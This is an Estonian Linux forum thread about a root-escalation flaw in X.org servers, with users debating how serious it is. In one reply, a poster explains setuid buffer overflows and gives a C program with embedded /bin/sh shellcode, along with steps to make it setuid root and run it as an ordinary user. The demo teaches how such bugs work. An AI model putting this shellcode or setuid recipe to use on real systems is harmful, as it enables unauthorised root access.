Autor |
Sõnum |
spott
Admin
Vanus: 43
Liitunud: 04.06.2005
Postitused: 8857
Distributsioon: Ubuntu
|
|
On leitud ohtlik viga erinevates X.org serverites, mis võimaldavad X serverile ligi pääsedes võtta endale root kasutaja õigused. Kuna mitmel puhul on tegu väga lihtsa nipiga, kuidas seda teha, siis on kiiresti välja lastud ka vastavad parandused. Ohustatud on kõik X.org serveri versioonid. Erinevad distributsioonid on alustanud juba uuendatud pakettide välja laskmisega. Seega, kui Teie paketihaldur pakub uuendada X-i, siis laske see tal kindlasti teha.
Lähemat infot saate LWN.net vahendusel.
|
|
|
|
_________________ Tellige endale sünnipäevaks, sõbrapäevaks või muuks tähtpäevaks kingitus: Kingitused internetist - NetiKink.eu
|
|
|
|
uniz
Vana Pingviin
Vanus: 45
Liitunud: 18.05.2006
Postitused: 764
Distributsioon: ubuntucare
|
|
Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..
|
|
|
|
|
|
|
|
HoHo
Vana Pingviin
Vanus: 40
Liitunud: 08.07.2005
Postitused: 527
Asukoht: Tallinn/Paide
Distributsioon: Gentoo
|
|
Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.
|
|
|
|
|
|
|
|
taavi
Pingviini kasutaja
Liitunud: 25.07.2005
Postitused: 59
Distributsioon: Arch, Debian
|
|
uniz kirjutas: | Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja.. |
Kas sa oled irooniline või täielik ignorant?
|
|
|
|
|
|
|
|
johnsmith
Vana Pingviin
Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD
|
|
Kõigepealt pead kasutajana sisse logima ja siis käivitad mingi legaalse programmi millele antakse valed parameetrid ja mille keegi assemblerit tundev koll on valmis meisterdanud.
Seal peavad mingid lisa moodulid olema ka asendatud.
Nende kõikide probleemide ema on setuid ja setgid õigusi omavad programmid.
Need programmid on tehtud, et kasutaja saaks käivitada mingi teenuse mis nõuab juure õigusi kuid olles sisse loginud tavakasutajana.
Selle asemel aga, et käivitada legaalne teenus kirjutab pätt programm puskurist üle ja käivitatakse hoopis shell juure õigustega.
Proovi ise
Kood: |
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
int main(int argc, char **argv){
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < (int) strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer, large_string);
return 0;
}
|
Kompileeri see ja su rootiks
chown root.root objektfile
chmod u+s objektfile
nüüd tagasi tavakasutajaks ja käivita see programm:
whoami ?
Tehnika on sama olenemata mis meetodit kasutatakse.
Soovitav on sellele programmile kinga anda pärast proovimist
|
|
|
|
_________________ "Thinking is the hardest work there is, which is probably the reason why so few engage in it" - Henry Ford
|
|
|
|
uniz
Vana Pingviin
Vanus: 45
Liitunud: 18.05.2006
Postitused: 764
Distributsioon: ubuntucare
|
|
HoHo kirjutas: | Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama. |
Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..
|
|
|
|
|
|
|
|
priit
Vana Pingviin
Vanus: 40
Liitunud: 04.08.2005
Postitused: 521
Asukoht: Tartu
Distributsioon: CentOS / OS X
|
|
uniz kirjutas: | HoHo kirjutas: | Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama. |
Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse.. |
Ma ei tea nüüd, mul oli pikka aega Windows 98 arvutis, nuhkvara küll ei olnud...
|
|
|
|
|
|
|
|
uniz
Vana Pingviin
Vanus: 45
Liitunud: 18.05.2006
Postitused: 764
Distributsioon: ubuntucare
|
|
Miks sa siis debiani kasutad?
|
|
|
|
|
|
|
|
priit
Vana Pingviin
Vanus: 40
Liitunud: 04.08.2005
Postitused: 521
Asukoht: Tartu
Distributsioon: CentOS / OS X
|
|
Sest mulle meeldib.
St mulle meeldivad alternatiivid, seda nii Linuxi, SkyOSi, BeOSi, Haiku, QNXi jmt näol. Kõiki olen kasutanud/katsetanud ja kavatsen ka edaspidi seda teha.
|
|
|
|
|
|
|
|
|